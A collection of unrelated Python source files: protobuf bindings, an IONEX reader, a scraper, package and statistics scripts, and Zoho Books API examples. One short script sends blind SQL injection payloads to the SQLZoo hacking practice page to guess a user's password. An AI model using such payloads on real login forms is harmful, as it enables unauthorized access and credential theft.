QueryDenomOwnersRequest = _reflection.GeneratedProtocolMessageType('QueryDenomOwnersRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYDENOMOWNERSREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryDenomOwnersRequest)
})
_sym_db.RegisterMessage(QueryDenomOwnersRequest)
DenomOwner = _reflection.GeneratedProtocolMessageType('DenomOwner', (_message.Message,), {
'DESCRIPTOR' : _DENOMOWNER,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.DenomOwner)
})
_sym_db.RegisterMessage(DenomOwner)
QueryDenomOwnersResponse = _reflection.GeneratedProtocolMessageType('QueryDenomOwnersResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYDENOMOWNERSRESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryDenomOwnersResponse)
})
_sym_db.RegisterMessage(QueryDenomOwnersResponse)
DESCRIPTOR._options = None
_QUERYBALANCEREQUEST.fields_by_name['address']._options = None
_QUERYBALANCEREQUEST._options = None
_QUERYALLBALANCESREQUEST.fields_by_name['address']._options = None
_QUERYALLBALANCESREQUEST._options = None
_QUERYALLBALANCESRESPONSE.fields_by_name['balances']._options = None
_QUERYTOTALSUPPLYREQUEST._options = None
_QUERYTOTALSUPPLYRESPONSE.fields_by_name['supply']._options = None
_QUERYSUPPLYOFRESPONSE.fields_by_name['amount']._options = None
_QUERYPARAMSRESPONSE.fields_by_name['params']._options = None
_QUERYDENOMSMETADATARESPONSE.fields_by_name['metadatas']._options = None
_QUERYDENOMMETADATARESPONSE.fields_by_name['metadata']._options = None
_DENOMOWNER.fields_by_name['address']._options = None
_DENOMOWNER.fields_by_name['balance']._options = None
_QUERY = _descriptor.ServiceDescriptor(
name='Query',
full_name='cosmos.bank.v1beta1.Query',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=1940,
serialized_end=3175,
methods=[
_descriptor.MethodDescriptor(
name='Balance',
full_name='cosmos.bank.v1beta1.Query.Balance',
index=0,
containing_service=None,
input_type=_QUERYBALANCEREQUEST,
output_type=_QUERYBALANCERESPONSE,
serialized_options=b'\202\323\344\223\0022\0220/cosmos/bank/v1beta1/balances/{address}/by_denom',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='AllBalances',
full_name='cosmos.bank.v1beta1.Query.AllBalances',
index=1,
containing_service=None,
input_type=_QUERYALLBALANCESREQUEST,
output_type=_QUERYALLBALANCESRESPONSE,
serialized_options=b'\202\323\344\223\002)\022\'/cosmos/bank/v1beta1/balances/{address}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='TotalSupply',
full_name='cosmos.bank.v1beta1.Query.TotalSupply',
index=2,
containing_service=None,
input_type=_QUERYTOTALSUPPLYREQUEST,
output_type=_QUERYTOTALSUPPLYRESPONSE,
serialized_options=b'\202\323\344\223\002\035\022\033/cosmos/bank/v1beta1/supply',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='SupplyOf',
full_name='cosmos.bank.v1beta1.Query.SupplyOf',
index=3,
containing_service=None,
input_type=_QUERYSUPPLYOFREQUEST,
output_type=_QUERYSUPPLYOFRESPONSE,
serialized_options=b'\202\323\344\223\002%\022#/cosmos/bank/v1beta1/supply/{denom}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='Params',
full_name='cosmos.bank.v1beta1.Query.Params',
index=4,
containing_service=None,
input_type=_QUERYPARAMSREQUEST,
output_type=_QUERYPARAMSRESPONSE,
serialized_options=b'\202\323\344\223\002\035\022\033/cosmos/bank/v1beta1/params',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='DenomMetadata',
full_name='cosmos.bank.v1beta1.Query.DenomMetadata',
index=5,
containing_service=None,
input_type=_QUERYDENOMMETADATAREQUEST,
output_type=_QUERYDENOMMETADATARESPONSE,
serialized_options=b'\202\323\344\223\002.\022,/cosmos/bank/v1beta1/denoms_metadata/{denom}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='DenomsMetadata',
full_name='cosmos.bank.v1beta1.Query.DenomsMetadata',
index=6,
containing_service=None,
input_type=_QUERYDENOMSMETADATAREQUEST,
output_type=_QUERYDENOMSMETADATARESPONSE,
serialized_options=b'\202\323\344\223\002&\022$/cosmos/bank/v1beta1/denoms_metadata',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='DenomOwners',
full_name='cosmos.bank.v1beta1.Query.DenomOwners',
index=7,
containing_service=None,
input_type=_QUERYDENOMOWNERSREQUEST,
output_type=_QUERYDENOMOWNERSRESPONSE,
serialized_options=b'\202\323\344\223\002+\022)/cosmos/bank/v1beta1/denom_owners/{denom}',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_QUERY)
DESCRIPTOR.services_by_name['Query'] = _QUERY
# @@protoc_insertion_point(module_scope)
|
py | b414ecf1a81d724d201e7aad4edbed452acf1e85 | from .ionex_file import IonexV1, NullContext
from .exceptions import IONEXError
from .exceptions import IONEXUnexpectedEnd
__all__ = ['reader']
def _get_version_type(line):
return float(line[:8]), line[20]
def reader(file):
"""Returns the file reader in IONEX format.
The reader is an iterable object, at each iteration it returns an instance
`` ionex_map.IonexMap`` next map read from file.
: type file: str | file-object
: param file: Path to the IONEX file or file object.
: raises IONEXError:
If the type or version of the uploaded file is unknown.
: raises IONEXUnexpectedEnd:
Incomplete file.
: raises IONEXMapError:
If there are errors while processing the card.
"""
readers = {
1.0: IonexV1,
}
if isinstance(file, str):
context_manager = open(file)
else:
context_manager = NullContext(file)
with context_manager as file_object:
try:
file_ver, file_type = _get_version_type(next(file_object))
except StopIteration:
raise IONEXUnexpectedEnd(file_object)
if file_type != 'I':
raise IONEXError('Unknown file type.')
if file_ver not in readers:
raise IONEXError('Unsupported version: {}'.format(file_ver))
reader_class = readers[file_ver]
return reader_class(file)
|
py | b414eef3d1fbf80a2a42dd40414bc4663437d495 | #!/usr/bin/python3
"""
@Author: Liu Shaoweihua
@Site: https://github.com/liushaoweihua
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
pretrained_urls = {
'bert_zh':
'https://storage.googleapis.com/bert_models/2018_11_03/chinese_L-12_H-768_A-12.zip',
'bert_wwm_ext_zh':
'https://storage.googleapis.com/chineseglue/pretrain_models/chinese_wwm_ext_L-12_H-768_A-12.zip',
'albert_xlarge_zh_brightmart':
'https://storage.googleapis.com/albert_zh/albert_xlarge_zh_177k.zip',
'albert_large_zh_brightmart':
'https://storage.googleapis.com/albert_zh/albert_large_zh.zip',
'albert_base_zh_brightmart':
'https://storage.googleapis.com/albert_zh/albert_base_zh.zip',
'albert_base_ext_zh_brightmart':
'https://storage.googleapis.com/albert_zh/albert_base_zh_additional_36k_steps.zip',
'albert_small_zh_brightmart':
'https://storage.googleapis.com/albert_zh/albert_small_zh_google.zip',
'albert_tiny_zh_brightmart':
'https://storage.googleapis.com/albert_zh/albert_tiny_zh_google.zip',
'roberta_zh_brightmart':
'https://storage.googleapis.com/chineseglue/pretrain_models/roeberta_zh_L-24_H-1024_A-16.zip',
'roberta_wwm_ext_zh_brightmart':
'https://storage.googleapis.com/chineseglue/pretrain_models/chinese_roberta_wwm_ext_L-12_H-768_A-12.zip',
'roberta_wwm_ext_large_zh_brightmart':
'https://storage.googleapis.com/chineseglue/pretrain_models/chinese_roberta_wwm_large_ext_L-24_H-1024_A-16.zip'
}
pretrained_names = list(pretrained_urls.keys())
pretrained_types = {}
for model_name in pretrained_names:
if model_name.startswith('bert'):
pretrained_types[model_name] = 'bert'
else:
pretrained_types[model_name] = '_'.join(
[model_name.split('_')[0], model_name.split('_')[-1]])
|
py | b414f06e82b44a455621d71d90952be80633fd04 | #!/usr/bin/env python3
# vim: set ai et ts=4 sw=4:
import requests
import sys
import os
import re
cputube_url = 'http://commitfest.cputube.org/';
commitfest_url = 'https://commitfest.postgresql.org/';
headers = {}
headers['user-agent'] = u'Mozilla/5.0 (compatible; MSIE 9.0; ' + \
u'Windows NT 6.0; Trident/5.0; Trident/5.0)'
body = requests.get(cputube_url, headers = headers).text
print("""
DROP TABLE IF EXISTS cputube;
CREATE TABLE cputube (url text, apply_passing bool, build_passing bool);
""");
sys.stdout.flush()
re_str = "(?is)<tr>\s*(<td>(\d+/\d+)</td>)\s*" + ("(<td[^>]*>(.*?)</td>\s*?)"*5) + "(<td>[^>]+</td>)?\s*</tr>"
for fi in re.finditer(re_str, body):
[pid, apply_passing, build_passing] = [fi.group(i) for i in [2, 10, 12]]
url = commitfest_url + pid + "/";
apply_passing = (apply_passing.find("apply-passing.svg") > 0)
if not apply_passing:
build_passing = False
else:
m = re.search('(?i)<img src="(https?://travis-ci.org/[^"]+.svg[^"]+)"', build_passing)
img_url = m.group(1)
# print("-- Fetching {}...".format(img_url))
img_content = requests.get(img_url, headers = headers).text
build_passing = (img_content.find(">passing</text>") > 0)
print("""
INSERT INTO cputube (url, apply_passing, build_passing) VALUES('{}', '{}', '{}');
""".format(url, 't' if apply_passing else 'f', 't' if build_passing else 'f'))
sys.stdout.flush()
|
py | b414f0e76da5086c02b5a733693156e8e3179392 | ################################### LICENSE ####################################
# Copyright 2016 Morphux #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
################################################################################
##
# sed_p2.py
# Created: 21/12/2016
# By: Louis Solofrizzo <[email protected]>
##
import os
class Sed_P2:
conf_lst = {}
e = False
root_dir = ""
def init(self, c_lst, ex, root_dir):
self.conf_lst = c_lst
self.e = ex
self.root_dir = root_dir
self.config = {
"name": "sed", # Name of the package
"version": "4.2.2", # Version of the package
"size": 10, # Size of the installed package (MB)
"archive": "sed-4.2.2.tar.bz2", # Archive name
"SBU": 0.2, # SBU (Compilation time)
"tmp_install": False, # Is this package part of the temporary install
"next": "shadow", # Next package to install
"before": False,
"after": False,
"urls": [ # Url to download the package. The first one must be morphux servers
"https://install.morphux.org/packages/sed-4.2.2.tar.bz2"
]
}
return self.config
def configure(self):
return self.e(["./configure",
"--prefix=/usr",
"--bindir=/bin",
"--htmldir=/usr/share/doc/sed-4.2.2"
])
def make(self):
return self.e(["make", "-j", self.conf_lst["cpus"]])
def install(self):
return self.e(["make", "install"])
|
py | b414f1da1cfa7f7b882a51b81886db09984ab95b | from os import listdir
from os.path import isfile, join
import pandas as pd
import sys
import numpy
from scipy import stats
import os
#MODES = ["default", "syntactic", "semantic", "graph"]
DATASETS = ["MR", "Ohsumed", "R8", "R52"]
MODES = ["default", "graph", "syntactic"]
def clean_text(txt):
return txt.split(':')[1].replace(',', '')
def get_metrics(file_path, info, mode, dataset):
# epochs = 0
with open(file_path) as f:
text = f.readlines()
for line in text:
if line[0:6] == "Epoch:":
#line = line.replace('\n', '').replace(', ', ' ').replace(':', ' ').replace('=', ' ')
epochs = line.split(" ")[1]
if line[0:17] == "Test set results:":
#line = line.replace('\n', '').replace(', ', ' ').replace(':', ' ').replace('=', ' ')
tokens = line.split(" ")
return {
"cost": tokens[4].replace(',', ''),
"accuracy": tokens[6].replace(',', ''),
"epochs": int(epochs),
"mode": mode,
"dataset": dataset,
"experiment": info[1],
"name": info[4],
"run": info[6].split(".")[0]
}
def calculate_basic_statistics(df, mode, dataset):
# Implment Basic statistics and save as csv
all_results = []
exp = []
for i in range(19): # This for controls the experiments. Use 25 to get all CUSTOM
experiment = df.loc[df['experiment'] == i]
experiment_name = df.loc[df['experiment'] == i]["name"].values[0]
exp.append(experiment["accuracy"])
results = {
'experiment': i,
'name': experiment_name,
'min': numpy.min(experiment["accuracy"]),
}
results["max"] = numpy.max(experiment["accuracy"])
results["mean"] = numpy.mean(experiment["accuracy"])
results["median"] = numpy.median(experiment["accuracy"])
results["variance"] = numpy.var(experiment["accuracy"])
results["standard_deviation"] = numpy.std(experiment["accuracy"])
results["min_epochs"] = numpy.min(experiment["epochs"])
results["max_epochs"] = numpy.max(experiment["epochs"])
results["mean_epochs"] = numpy.mean(experiment["epochs"])
results["median_epochs"] = numpy.median(experiment["epochs"])
results["var_epochs"] = numpy.var(experiment["epochs"])
results["std_epochs"] = numpy.std(experiment["epochs"])
all_results.append(results)
results = pd.DataFrame(all_results)
if not os.path.exists(f'./statistics/{mode}/'):
os.makedirs(f'./statistics/{mode}/')
results.to_csv(
# "./Basic_Statistics/"+dataset+".csv",
f'./statistics/{mode}/{dataset}.csv',
sep=';',
index=False
)
return results
def calculate_statistics(all_results, dataset):
print("------ Working with dataset", dataset, "------\n")
ORIGINAL_PAPER = {
"MR": {"avg": 0.7674, "std": 0.0020},
"Ohsumed": {"avg": 0.6836, "std": 0.0056},
"R8": {"avg": 0.9707, "std": 0.0010},
"R52": {"avg": 0.9356, "std": 0.0018}
}
results = pd.DataFrame(all_results)
max_result = results.loc[(results["mean"] == numpy.max(results["mean"]))]
print(results)
print(max_result)
ttest_ind_from_stats = stats.ttest_ind_from_stats(
mean2=max_result["mean"].values[0],
std2=max_result["standard_deviation"].values[0],
nobs2=10,
mean1=ORIGINAL_PAPER[dataset]["avg"],
std1=ORIGINAL_PAPER[dataset]["std"],
nobs1=10
)
print(ttest_ind_from_stats)
all_results = []
for mode in MODES:
for dataset in DATASETS:
for run in range(1):
#mypath = PATH+dataset+"/RUN_"+str(run)
# dataset+"/RUN_"+str(run)
mypath = f'experiments/{mode}/{dataset}/RUN_{run}'
onlyfiles = [f for f in listdir(mypath) if isfile(
join(mypath, f)) and f[-4:] == ".txt"]
# EXPERIMENT_11_model_mr_DO05_run_6.txt
for f in onlyfiles:
info = f.split("_")
# print(info)
all_results.append(get_metrics(
mypath+"/"+f, info, mode, dataset))
df = pd.DataFrame(data=all_results)
df["cost"] = pd.to_numeric(df["cost"])
df["accuracy"] = pd.to_numeric(df["accuracy"])
df["experiment"] = pd.to_numeric(df["experiment"])
df["run"] = pd.to_numeric(df["run"])
df = df.sort_values(by=['experiment', 'run', 'mode', 'dataset'])
df = df.reset_index(drop=True)
statistics_results = []
best_results = []
for mode in MODES:
for dataset in DATASETS:
#experiments = df.loc[df['dataset'] == dataset]
experiments = df.loc[(df['mode'] == mode) & (df['dataset'] == dataset)]
calculate_basic_statistics(experiments, mode, dataset)
for experiment in range(19):
experiment_results = df.loc[(df["experiment"] == experiment)]
statistics_results.append(calculate_statistics(experiment_results, dataset))
results = pd.DataFrame(statistics_results)
max_result = results.loc[(results["mean"] == numpy.max(results["mean"]))]
best_results.append(calculate_statistics(max_result, dataset))
statistics_results_df = pd.DataFrame(statistics_results)
best_results_df = pd.DataFrame(best_results)
statistics_results_df.to_csv(
"./statistics/all_results.csv",
sep=';',
index=False
)
best_results_df.to_csv(
"./statistics/best_results.csv",
sep=';',
index=False
)
#statistics_results = []
#best_results = []
# for dataset in DATASETS:
# all_results = basic_stats[dataset]
# for experiment in range(19):
# results = pd.DataFrame(all_results)
# experiment_results = results.loc[(results["experiment"] == experiment)]
# statistics_results.append(calculate_statistics(experiment_results, dataset))
# results = pd.DataFrame(all_results)
# max_result = results.loc[(results["mean"] == numpy.max(results["mean"]))]
# best_results.append(calculate_statistics(max_result, dataset))
# statistics_results_df = pd.DataFrame(statistics_results)
# best_results_df = pd.DataFrame(best_results)
# statistics_results_df.to_csv(
# "./statistics/all_results.csv",
# sep=';',
# index=False
# )
# best_results_df.to_csv(
# "./statistics/best_results.csv",
# sep=';',
# index=False
# ) |
py | b414f1fee63406a59bcaf4416986b5d35ab81275 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2009- Spyder Project Contributors
#
# Distributed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
from spyder.plugins.pylint.plugin import Pylint as PLUGIN_CLASS
|
py | b414f2e45d0de1c02c5f767d337619424b88a795 | """
ASGI config for news_feed project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'news_feed.settings')
application = get_asgi_application()
|
py | b414f372cdbff51685be03a18d99155874705437 | # https://www.blog.pythonlibrary.org/2012/06/08/python-101-how-to-submit-a-web-form/
# https://stackoverflow.com/questions/28932205/automatizing-web-browser-form-filling-in-python
# https://github.com/jmcarp/robobrowser
# https://mechanicalsoup.readthedocs.io/en/stable/tutorial.html
import mechanicalsoup as ms
url = "https://sqlzoo.net/hack/"
# br = mechanize.Browser()
br = ms.StatefulBrowser()
br.open(url)
""" html from 'passwd.pl'
<br><form>
Please enter your name and password<br>
<table><tbody><tr><td>name:</td><td> <input name="name"></td></tr>
<tr><td>password:</td><td> <input type="password" name="password"></td></tr>
</tbody></table>
<input type="submit">
</form>
"""
name = "String"
password = "String"
form = {"name" : name, "password" : password}
# https://3.python-requests.org/user/quickstart/#passing-parameters-in-urls
load = {"name" : "' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='", "password" : "' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='"}
r = requests.get("https://sqlzoo.net/hack/passwd.pl", params = load)
r.text
load2 = {"name" : "' OR EXISTS(SELECT * FROM users WHERE name LIKE '%j%' AND password LIKE '%') AND ''='", "password" : "' OR EXISTS(SELECT * FROM users WHERE name LIKE '%j%' AND password LIKE '%') AND ''='"}
r2 = requests.get("https://sqlzoo.net/hack/passwd.pl", params = load2)
print(r2.text)
# This works because the LIKE command uses % and _ as wildcards. The % wildcard matches any string, the _ wildcard matches a single character.
|
py | b414f3cb3e418cc0d4014b73a67e48de95c8f45b | #$Id$#
from books.model.Preference import Preference
from books.model.Organization import Organization
from books.model.Address import Address
from books.model.User import User
from books.model.Item import Item
from books.model.InvoiceSetting import InvoiceSetting
from books.model.NotesAndTerms import NotesAndTerms
from books.model.EstimateSetting import EstimateSetting
from books.model.CreditnoteSetting import CreditnoteSetting
from books.model.Currency import Currency
from books.model.ExchangeRate import ExchangeRate
from books.model.Tax import Tax
from books.model.OpeningBalance import OpeningBalance
from books.model.Account import Account
from books.model.Autoreminder import Autoreminder
from books.model.ManualReminder import ManualReminder
from books.model.TaxGroup import TaxGroup
from books.service.ZohoBooks import ZohoBooks
import os
access_token = os.environ.get('ACCESS_TOKEN')
organization_id = os.environ.get('ORGANIZATION_ID')
zoho_books = ZohoBooks(access_token, organization_id)
settings_api = zoho_books.get_settings_api()
organizations_api = zoho_books.get_organizations_api()
users_api = zoho_books.get_users_api()
items_api = zoho_books.get_items_api()
currency_id = settings_api.get_currencies().get_currencies()[0].get_currency_id()
#List preferences
print settings_api.list_preferences()
#Update preference
preference = Preference()
preference.set_convert_to_invoice(False)
preference.set_notify_me_on_online_payment(True)
preference.set_send_payment_receipt_acknowledgement("")
preference.set_auto_notify_recurring_invoice("")
preference.set_snail_mail_include_payment_stub("")
preference.set_is_show_powered_by(True)
preference.set_attach_expense_receipt_to_invoice("")
preference.set_allow_auto_categorize("")
print settings_api.update_preferences(preference)
# Create a unit
print settings_api.create_unit("m")
#Delete unit
unit_id = "71127000000179031"
print settings_api.delete_unit(unit_id)
#Organization
organization_id = organizations_api.get_organizations()[0].get_organization_id()
# List organizations.
print organizations_api.get_organizations()
#Get organization
print organizations_api.get(organization_id)
#Create organization
organization = Organization()
organization.set_name("Jony and co")
address = Address()
address.set_street_address1("2/65")
address.set_street_address2("vignesh plaza")
address.set_city("MDU")
address.set_state("TN")
address.set_country("India")
address.set_zip("322")
organization.set_address(address)
organization.set_industry_type("")
organization.set_industry_size("")
organization.set_fiscal_year_start_month("january")
organization.set_currency_code("USD")
organization.set_time_zone("Asia/Calcutta")
organization.set_date_format("dd MMM yyyy")
organization.set_field_separator("")
organization.set_language_code("en")
organization.set_tax_basis("accrual")
organization.set_tax_type("tax")
organization.set_org_address("")
organization.set_remit_to_address("")
print organizations_api.create(organization)
#Update organization
organization = Organization()
organization.set_name("Jony and co")
address = Address()
address.set_street_address1("2/65")
address.set_street_address2("vignesh plaza")
address.set_city("MDU")
address.set_state("TN")
address.set_country("India")
address.set_zip("322")
organization.set_address(address)
organization.set_industry_type("")
organization.set_industry_size("")
organization.set_fiscal_year_start_month("january")
organization.set_currency_code("INR")
organization.set_time_zone("Asia/Calcutta")
organization.set_date_format("dd MMM yyyy")
organization.set_field_separator("")
organization.set_language_code("en")
organization.set_tax_basis("accrual")
organization.set_tax_type("tax")
organization.set_org_address("")
organization.set_remit_to_address("")
print organizations_api.update(organization_id, organization)
# User
user_id = users_api.get_users().get_users()[0].get_user_id()
#List user
print users_api.get_users()
param = {'filter_by': 'Status.All'}
print users_api.get_users(param)
# Get user
print users_api.get(user_id)
# current user
print users_api.current_user()
#Create user
user = User()
user.set_name("karanya")
user.set_email("[email protected]")
user.set_user_role("staff")
print users_api.create(user)
#update user
user = User()
user.set_name("vakaa")
user.set_email("[email protected]")
user.set_user_role("staff")
print users_api.update(user_id, user)
#delete user
print users_api.delete(user_id)
#Invite user
print users_api.invite_user(user_id)
#Mark user as active
print users_api.mark_user_as_active(user_id)
#Mark user as inactive
print users_api.mark_user_as_inactive(user_id)
# Item
item_id = items_api.list_items().get_items()[0].get_item_id()
# List items.
print items_api.list_items()
# Get an item
print items_api.get(item_id)
# Create item
item = Item()
item.set_name("Item 2")
item.set_description("Item")
item.set_rate(10.0)
item.set_account_id("")
item.set_tax_id("")
print items_api.create(item)
#Update item
item = Item()
item.set_name("item 1")
item.set_description("Item")
item.set_rate(100.0)
item.set_account_id("")
item.set_tax_id("")
print items_api.update(item_id, item)
#Delete item
print items_api.delete_item(item_id)
#Mark item as active
print items_api.mark_item_as_active(item_id)
#Mark item as inactive
print items_api.mark_item_as_inactive(item_id)
#Invoice Settings
#Get invoice settings
print settings_api.get_invoice_settings()
#update invoice settings
invoice_settings = InvoiceSetting()
invoice_settings.set_auto_generate(True)
invoice_settings.set_prefix_string("INV")
invoice_settings.set_start_at(1)
invoice_settings.set_next_number("43")
invoice_settings.set_quantity_precision(2)
#invoice_settings.set_discount_enabled(False)
invoice_settings.set_reference_text("")
#invoice_settings.set_default_template_id("")
invoice_settings.set_notes("Hai")
invoice_settings.set_terms("")
invoice_settings.set_is_shipping_charge_required(True)
invoice_settings.set_is_adjustment_required(True)
invoice_settings.set_invoice_item_type("")
invoice_settings.set_discount_type("item_level")
invoice_settings.set_warn_convert_to_open(True)
invoice_settings.set_warn_create_creditnotes(True)
invoice_settings.set_is_open_invoice_editable(True)
invoice_settings.set_is_sales_person_required(True)
print settings_api.update_invoice_settings(invoice_settings)
#Get invoice notes and terms
print settings_api.get_invoice_notes_and_terms()
#Update invoice notes and terms
notes_and_terms = NotesAndTerms()
notes_and_terms.set_notes("Thanks")
notes_and_terms.set_terms("")
print settings_api.update_invoice_notes_and_terms(notes_and_terms)
"""
#Estimates
#Get estimates settings.
"""
print settings_api.get_estimate_settings()
#update estimate settings
estimate_settings = EstimateSetting()
estimate_settings.set_auto_generate(True)
estimate_settings.set_prefix_string("EST-")
estimate_settings.set_start_at(2)
estimate_settings.set_next_number("041")
estimate_settings.set_quantity_precision(2)
estimate_settings.set_discount_type("item_level")
estimate_settings.set_reference_text("")
estimate_settings.set_notes("Hai")
estimate_settings.set_terms("")
estimate_settings.set_terms_to_invoice(True)
estimate_settings.set_notes_to_invoice(True)
estimate_settings.set_warn_estimate_to_invoice(True)
estimate_settings.set_is_sales_person_required(True)
print settings_api.update_estimate_settings(estimate_settings)
#Get estimates notes and terms.
print settings_api.get_estimates_notes_and_terms()
#update estimate notes and terms
notes_and_terms = NotesAndTerms()
notes_and_terms.set_notes("Thanks")
notes_and_terms.set_terms("")
print settings_api.update_estimates_notes_and_terms(notes_and_terms)
"""
#Creditnotes
#List credit note
"""
print settings_api.list_creditnote_settings()
#Update creditnotes settings
creditnote_settings = CreditnoteSetting()
creditnote_settings.set_auto_generate(True)
creditnote_settings.set_prefix_string("CN-")
creditnote_settings.set_reference_text("")
creditnote_settings.set_next_number("0027")
creditnote_settings.set_notes("Thank you")
creditnote_settings.set_terms("Conditions Apply")
print settings_api.update_creditnote_settings(creditnote_settings)
#Get creditnote notes and terms
print settings_api.get_creditnote_notes_and_terms()
#update creditnote notes and terms
notes_and_terms = NotesAndTerms()
notes_and_terms.set_notes("Thanks")
notes_and_terms.set_terms("")
print settings_api.update_creditnote_notes_and_terms(notes_and_terms)
"""
#Currency and exchange rate
#List currencies
"""
print settings_api.get_currencies()
#Get a currency
print settings_api.get_currency(currency_id)
#Create a currency
currency = Currency()
currency.set_currency_code("NPR")
currency.set_currency_symbol("")
currency.set_price_precision(1)
currency.set_currency_format("1,234,567.89")
print settings_api.create_currency(currency)
#Update currency
currency = Currency()
currency.set_currency_code("NPR")
currency.set_currency_symbol("")
currency.set_price_precision(1)
currency.set_currency_format("1,234,567.89")
print settings_api.update_currency(currency_id , currency)
#Delete currency
print settings_api.delete_currency(currency_id)
"""
#List exchange rates
exchange_rate_id = settings_api.list_exchange_rates(currency_id).get_exchange_rates()[0].get_exchange_rate_id()
"""
print settings_api.list_exchange_rates(currency_id)
#Get exchange rate
print settings_api.get_exchange_rate(currency_id, exchange_rate_id)
#Create an exchange rate
exchange_rate = ExchangeRate()
exchange_rate.set_currency_id(currency_id)
exchange_rate.set_currency_code("NPR")
exchange_rate.set_effective_date("2014-05-08")
exchange_rate.set_rate(25.0)
print settings_api.create_exchange_rate(exchange_rate)
#Update an exchange rate
exchange_rate = ExchangeRate()
exchange_rate.set_exchange_rate_id(exchange_rate_id)
exchange_rate.set_currency_id(currency_id)
exchange_rate.set_currency_code("EUR")
exchange_rate.set_effective_date("2014-05-08")
exchange_rate.set_rate(25.0)
print settings_api.update_exchange_rate(exchange_rate)
#Delete an exchange rate
print settings_api.delete_exchange_rate(currency_id, exchange_rate_id)
"""
#Tax and Tax group
tax_id = settings_api.get_taxes().get_taxes()[0].get_tax_id()
tax_group_id = "71127000000184003"
#List taxes
"""
print settings_api.get_taxes()
#Get a tax
print settings_api.get_tax(tax_id)
#Create tax
tax = Tax()
tax.set_tax_name("tax-1")
tax.set_tax_percentage(10.5)
tax.set_tax_type("tax")
print settings_api.create_tax(tax)
#update tax
tax = Tax()
tax.set_tax_name("Shipping_tax1")
tax.set_tax_percentage(10.5)
tax.set_tax_type("tax")
print settings_api.update_tax(tax_id, tax)
#Delete tax
print settings_api.delete_tax(tax_id)
#Get tax group
print settings_api.get_tax_group(tax_group_id)
#Create tax group
tax_group = TaxGroup()
tax_group.set_tax_group_name("group_taxes")
taxes = "71127000000183009,71127000000191007"
tax_group.set_taxes(taxes)
print settings_api.create_tax_group(tax_group)
#update tax group
tax_group = TaxGroup()
tax_group.set_tax_group_name("group_taxes")
taxes = "71127000000185001,71127000000183007"
tax_group.set_taxes(taxes)
tax_group.set_tax_group_id(tax_group_id)
print settings_api.update_tax_group(tax_group)
#Delete tax group
tax_group_id = "711270"
print settings_api.delete_tax_group(tax_group_id)
"""
#Opening balance
#Get opening balance
"""
print settings_api.get_opening_balance()
#Create opening balance
account_id="71127000000170302"
opening_balance = OpeningBalance()
opening_balance.set_date('2014-05-09')
accounts = Account()
accounts.set_account_id(account_id)
accounts.set_debit_or_credit("debit")
accounts.set_exchange_rate(1.0)
accounts.set_currency_id(currency_id)
accounts.set_amount(200.0)
opening_balance.set_accounts(accounts)
print settings_api.create_opening_balance(opening_balance)
#Update opening balance
account_id="71127000000170302"
opening_balance = OpeningBalance()
opening_balance.set_opening_balance_id("71127000000186001")
opening_balance.set_date('2014-05-09')
accounts = Account()
accounts.set_account_id(account_id)
accounts.set_debit_or_credit("debit")
accounts.set_exchange_rate(1.0)
accounts.set_currency_id("71127000000000099")
accounts.set_amount(2000.0)
opening_balance.set_accounts(accounts)
print settings_api.update_opening_balance(opening_balance)
#Delete opening balance
print settings_api.delete_opening_balance()
"""
#Auto payment reminder
auto_payment_reminder_id = settings_api.list_auto_payment_reminder().get_auto_reminders()[0].get_autoreminder_id()
#List auto payment reminder
"""
print settings_api.list_auto_payment_reminder()
"""
#Get an auto payment reminder
print settings_api.get_auto_payment_reminder(auto_payment_reminder_id)
"""
#Update an auto reminder
autoreminder = Autoreminder()
autoreminder.set_is_enabled(True)
autoreminder.set_notification_type('days_after_due_date')
autoreminder.set_address_type('remind_me')
autoreminder.set_number_of_days(3)
autoreminder.set_subject('hai')
autoreminder.set_body('Reminder')
print settings_api.update_auto_reminder(reminder_id, autoreminder)
"""
#List manual reminders
reminder_id = settings_api.list_manual_reminders().get_manual_reminders()[0].get_manualreminder_id()
"""
print settings_api.list_manual_reminders()
"""
#Get a manual reminder
print settings_api.get_manual_reminder(reminder_id)
"""
#Update a manual reminder
manual_reminder = ManualReminder()
manual_reminder.set_subject("Hello")
manual_reminder.set_body("Manual reminder")
manual_reminder.set_cc_me(False)
print settings_api.update_manual_reminder(reminder_id, manual_reminder)
"""
|
py | b414f5470f8f82aa8ec187ccddc4098799225fc0 | import heapq
from scipy.sparse import csr_matrix
from sklearn import preprocessing
import numpy as np
from socialsent.representations.matrix_serializer import load_vocabulary, load_matrix
class Explicit:
"""
